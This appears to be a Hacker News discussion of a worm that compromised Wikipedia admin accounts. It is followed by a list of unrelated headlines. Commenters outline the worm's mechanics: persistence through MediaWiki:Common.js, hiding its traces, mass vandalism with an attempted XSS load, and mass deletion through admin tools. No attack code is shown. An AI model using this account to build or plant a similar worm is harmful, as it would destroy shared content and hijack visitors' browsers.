Wikipedia in read-only mode following mass admin account compromise

It seems like the worm code/the replicated code only really attacks stuff on site. But leaking credentials (and obviously people reuse passwords across sites) could be sooo much worse.

[0] https://varun.ch/posts/autofill/

af78•40m ago

Time to add 2FA...

stephbook•3m ago

Chrome doesnt actually autofill before you interact. It only displays what it would fill in at the same location visually.

256_•56m ago

Here before someone says that it's because MediaWiki is written in PHP.

Dwedit•54m ago

PHP is the language where "return flase" causes it to return true.

https://danielc7.medium.com/remote-code-execution-gaining-do...

m4tthumphrey•51m ago

Also the language that runs half of the web.

Also the language that has made me millions over my career with no degree.

Also the language that allows people to be up and running in seconds (with or without AI).

I could go on.

jjice•48m ago

PHP is a fine language. It started my career. That said, it has a lot of baggage that can let you shoot yourself in the foot. Modern PHP is pretty awesome though.

radium3d•31m ago

Pretty sure we've seen people coding in essentially every other programming language also shoot themselves in the foot.

theamk•42m ago

Yep, that's the sad truth - a language popularity often has nothing to do with it's security properties. People will happily keep churning out insecure junk as long as it makes them millions, botnet and data compromises be damned.

ChrisMarshallNY•38m ago

I use it on the backends of my stuff.

Works great, but, like any tool, usage matters.

People who use tools badly, get bad results.

I've always found the "Fishtank Graph" to be relevant: https://w3techs.com/technologies/history_overview/programmin...

onion2k•36m ago

Also the language that runs half of the web.

The bottom half.

;)

ramon156•34m ago

The language is not what makes you nor the product. You could've written the same thing in RoR, PHP was just first and it's why it still exists

stackghost•22m ago

PHP performance is significantly better than Ruby on Rails, which I think plays a part in its continued popularity.

radium3d•33m ago

PHP is insanely great, and very fast. The hate has no clout.

dspillett•30m ago

> Also the language that has made me millions over my career with no degree.

Well done.

> Also the language that allows people to be up and running in seconds (with or without AI).

People getting up and running without any opportunity to be taught about security concerns (even those as simple as the risks of inadequate input verification), especially considering the infamous inconsistency in PHP's APIs which can lead to significant foot-guns, is both a blessing and a curse… Essentially a pre-cursor to some of the crap that is starting to be published now via vibe-coding with little understanding.

cwillu•15m ago

Try not to take criticisms of tools personally. Phillips head screws are shit for a great many applications, while simultaneously being involved in billions of dollars of economic activity, and being a driver that everyone has available.

jasonjayr•7m ago

Perl still runs the other half?

420official•43m ago

FWIW this was fixed in 2020

dspillett•22m ago

I've not used PHP in anger in well over a decade, but if the general environment out there is anything like it was back then there are likely a lot of people, mostly on cheap shared hosting arrangements, running PHP versions older than that and for the most part knowing no better.

That isn't the fault of the language of course, but a valid reason for some of the “ick” reaction some get when it is mentioned.

ale42•30m ago

Except that in a contemporary PHP that doesn't work any more.

  PHP Warning:  Uncaught Error: Undefined constant "flase" in php shell code:1

This means game over, the script stops there.

nhubbard•46m ago

Wow. This worm is fascinating. It seems to do the following:

- Inject itself into the MediaWiki:Common.js page to persist globally, and into the User:Common.js page to do the same as a fallback

- Uses jQuery to hide UI elements that would reveal the infection

- Vandalizes 20 random articles with a 5000px wide image and another XSS script from basemetrika.ru

- If an admin is infected, it will use the Special:Nuke page to delete 3 random articles from the global namespace, AND use the Special:Random with action=delete to delete another 20 random articles

EDIT! The Special:Nuke is really weird. It gets a default list of articles to nuke from the search field, which could be any group of articles, and rubber-stamps nuking them. It does this three times in a row.

256_•43m ago

As someone on the Wikipediocracy forums pointed out, basemetrika.ru does not exist. I get an NXDomain response trying to resolve it. The plot thickens.

pKropotkin•39m ago

Yeah, basemetrika.ru is free now. Should we occupy it? ;)

256_•35m ago

I'm half-tempted to try and claim it myself for fun and profit, but I think I'll leave it for someone else.

What should we put there, anyway?

gchamonlive•32m ago

I'd log requests and echo them back in the page

gibsonsmog•30m ago

Go old school and have the script inject the "how did this get here im not good with computers" cat onto random pages

speedgoose•25m ago

A JavaScript call to window.alert to pause the JavaScript VM.

Barbing•5m ago

Namecheap won’t sell it which is great because it made me pause and wonder whether it's legal for an American to send Russians money for a TLD.

amiga386•5m ago

It means giving money to the Russian government, so no.

If anyone from the Russian government is reading this, get the fuck out of Ukraine. Thank you.

dheera•35m ago

Wouldn't be surprised if elaborate worms like this are AI-designed

nhubbard•34m ago

I wouldn't be surprised either. But the original formatting of the worm makes me think it was human written, or maybe AI assisted, but not 100% AI. It has a lot of unusual stylistic choices that I don't believe an AI would intentionally output.

integralid•5m ago

I would. AI designed software in general does not include novel ideas. And this is the kind of novel software AI is not great at, because there's not much training data.

Of course it's very possible someone wrote it with AI help. But almost no chance it was designed by AI.

bawolff•10m ago

> Vandalizes 20 random articles with a 5000px wide image and another XSS script from basemetrika.ru

Note while this looks like its trying to trigger an xss, what its doing is ineffective, so basemetrika.ru would never get loaded (even ignoring that the domain doesnt exist)

epicprogrammer•43m ago

This is basically a weaponized, highly destructive version of the old MySpace Samy worm. Hitting MediaWiki:Common.js is the absolute nightmare scenario for MediaWiki deployments because that script gets executed by literally every single visitor and editor across the entire site, creating a massive, instant propagation loop. The fact that it specifically targets admins and then uses jQuery to blind them by hiding the UI elements while it silently triggers Special:Nuke in the background is incredibly insidious. It really exposes the foundational danger of legacy web architectures that still allow executable JavaScript to be stored and served directly from user-editable namespaces. Cleaning this up is going to be an absolute forensic nightmare for the Wikimedia team since the database history itself is the active distribution vector.

devmor•38m ago

In the early 2010’s I worked for a company whose primary income was subscriptions to site protection services - one of which included cleaning up malware-infected Wordpress installations. I worked on the team that did this job.

This exact type of database-stored executable javascript was one of the most annoying types of infections to clean up.

0xWTF•31m ago

Ok, so there are tons of mediawiki installations all over the internet. What do these operators do? Set their wikis to read-only mode, hang tight, and wait for a security patch?

Also, does this worm have a name?

bawolff•26m ago

There is nothing to do, the incident was not caused by a vulnerability in mediawiki.

Basically someone who had permissions to alter site js, accidentally added malicious js. The main solution is to be very careful about giving user accounts permission to edit js.

[There are of course other hardening things that maybe should be done based on lessons learned]

streetfighter64•5m ago

Well, admins (or anybody other than the developers / deployment pipeline) having permissions to alter the JS sounds like a significant vulnerability. Maybe it wasn't in the early 2000s, but unencrypted HTTP was also normal then.

j45•25m ago

Too much app logic in the client side (Javascript) has always been an attack vector. The more that can reasonably be server side, the more that can't be seen.

dns_snek•57s ago

[delayed]

quantum_magpie•5m ago

Could you point to where you found the details of the exploit? It’s not in the linked page. Really interested.

pixl97•2m ago

>Cleaning this up

Find the first instance and reset to the backup before then. An hour, a day, a week? Doesn't matter that much in this case.

Uhhrrr•39m ago

How do they know? Has this been published in a Reliable Source?

nhubbard•30m ago

This is the official Wikimedia Foundation status page for the whole of Wikipedia, so it's a reliable primary source.

vova_hn2•4m ago

Actually, usage of primary sources is kinda complicated [0], generally Wikipedia prefers secondary and tertiary sources.

[0] https://en.wikipedia.org/wiki/Wikipedia:No_original_research...

0xWTF•34m ago

Looking forward to the postmortem...

Wikipedianon•33m ago

This was only a matter of time.

The Wikipedia community takes a cavalier attitude towards security. Any user with "interface administrator" status can change global JavaScript or CSS for all users on a given Wiki with no review. They added mandatory 2FA only a few years ago...

Prior to this, any admin had that ability until it was taken away due to English Wikipedia admins reverting Wikimedia changes to site presentation (Mediaviewer).

But that's not all. Most "power users" and admins install "user scripts", which are unsandboxed JavaScript/CSS gadgets that can completely change the operation of the site. Those user scripts are often maintained by long abandoned user accounts with no 2 factor authentication.

Based on the fact user scripts are globally disabled now I'm guessing this was a vector.

The Wikimedia foundation knows this is a security nightmare. I've certainly complained about this when I was an editor.

But most editors that use the website are not professional developers and view attempts to lock down scripting as a power grab by the Wikimedia Foundation.

256_•26m ago

Maybe somewhat unrelated, but I'm reminded of the fact that people have deleted the main page on a few occasions: https://en.wikipedia.org/wiki/Wikipedia:Don%27t_delete_the_m...

chris_wot•13m ago

Most admins on Wikipedia are incompetent.

skrtskrt•30m ago

Long past time to eliminate JavaScript from existence

dgxyz•14m ago

This.

Actually fuck the whole dynamic web. Just give us hypertext again and build native apps.

Edit: perhaps I shouldn't say this on an VC driven SaaS wankfest forum...

nixass•29m ago

I can edit it

j45•27m ago

It's reassuring to know Wikipedia has these kinds of security mechanisms in place.

lifeisstillgood•21m ago

I completely understand marking the software that controls drinking water as critical infrastructure- but at some point a state based cyber attack that just wipes wikipedia off the net is deeply damaging to our modern society’s ability to agree on common facts …

Just now thought “if Wikipedia vanished what would it mean … and it’s not on the level of safe drinking water, but it is a level.

Aperocky•10m ago

All persistent data should have backup.

It's not a high bar.

lyu07282•6m ago

There are so many mirrors anyway and trivial to get a local copy? What is much more concerning is government censorship and age verification/digital id laws where what articles you read becomes part of your government record the police sees when they pull you over.

garbagecreator•20m ago

Another reason to make the default disabling JS on all websites, and the website should offer a service without JS, especially those implemented in obsolete garbage tech. If it's not an XSS from a famous website, it will be an exploit from a sketchy website.

wikiperson26•20m ago

A theory on phab: "Some investigation was made in Russian Wikipedia discord chat, maybe it will be useful.

1. In 2023, vandal attacks was made against two Russian-language alternative wiki projects, Wikireality and Cyclopedia. Here https://wikireality.ru/wiki/РАОрг is an article about organisators of these attacks.

2. In 2024, ruwiki user Ololoshka562 created a page https://ru.wikipedia.org/wiki/user:Ololoshka562/test.js containing script used in these attacks. It was inactive next 1.5 years.

3. Today, sbassett massively loaded other users' scripts into his global.js on meta, maybe for testing global API limits: https://meta.wikimedia.org/wiki/Special:Contributions/SBasse... . In one edit, he loaded Ololoshka's script: https://meta.wikimedia.org/w/index.php?diff=prev&oldid=30167... and run it."

BBC Journalist SEO-Hacks ChatGPT and Google's AI

Show HN: SeaRoutes, find the shortest navigable sea routes on the globe

The Rise of the Financial Engineer

Show HN: Next job comes from someone you barely know

The Predatory Hegemon

US Draft Rules for Power over Nvidia's Global Sales

A Guide to Wine Certification Programs

Iranian strikes on Amazon data centers highlight industry's vulnerability

The Download: The startup that says it can stop lightning, and inside OpenAI's

Building a Database on S3

The largest open-source humanized voice library

Congress Is Considering Abolishing Your Right to Be Anonymous Online

Olmo Hybrid

Show HN: RedDragon, LLM-assisted IR analysis of code across languages

Exfiltrating passwords with no interaction using autofill

Show HN: Plought – Reduce noise in decision making

The Brand Age

We Only Accept Pre-Revenue Projects

My application programmer instincts failed when debugging assembler

Launch HN: Vela (YC W26) – AI for complex scheduling

Which H100 Instance to Train Nanochat – Benchmarking PCIe, SXM, and NVL

Düren's Hydrogen Bet: The Math Behind a Looming Liability

Using Structured Light Scanning and Photogrammetry in Cultural Heritage

Financial AGI announced – outperforms human experts on 12 professional exams

Most AI agent demos won't survive enterprise security review

Show HN: Experiment- enforcing accessibility guardrails during AI UI generation

Ask HN: Have you noticed how the number of 'Show HN' posts has skyrocketed?

CSUN Assistive Technology Conference 2026 files

Show HN: Chatddit.com Fresh off the vibe press

I'm a Coin Boy, Too (2023)